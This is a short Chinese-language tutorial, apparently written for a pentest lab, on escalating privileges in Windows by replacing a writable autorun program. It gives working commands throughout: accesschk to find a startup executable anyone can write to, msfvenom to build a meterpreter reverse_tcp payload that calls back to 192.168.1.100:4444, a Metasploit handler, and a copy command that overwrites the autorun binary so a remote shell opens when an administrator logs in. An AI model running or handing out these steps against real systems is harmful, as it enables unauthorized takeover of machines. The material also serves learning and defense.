可修改的自启程序提权

参考资料:

我的视频教程:https://www.bilibili.com/video/av89635859/

漏洞原理

可修改的自启程序提权是利用了自启程序权限不正确。
C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
找到开机自启的程序


C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu “C:\Program Files\Autorun Program”
发现该程序任何人都可读可写

修改自启程序

1
2
3
4
5
6
7
8
handler -H 192.168.1.100 -P 4444 -p windows/x64/meterpreter/reverse_tcp

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o program.exe

C:\Program Files\Autorun Program
copy /y c:\Temp\program.exe "C:\Program Files\Autorun Program\program.exe"

windows 10 path: C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

重启目标机,即可得到shell。

要注意两点

  1. 只有管理员登陆目标机器,才能获得反弹的shell,普通用户登入,修改后的自启程序会报错。
  2. C:\Program Files\Autorun Program\program.exe 只能修改,不能删除原文件,再次新建(需要管理员权限)。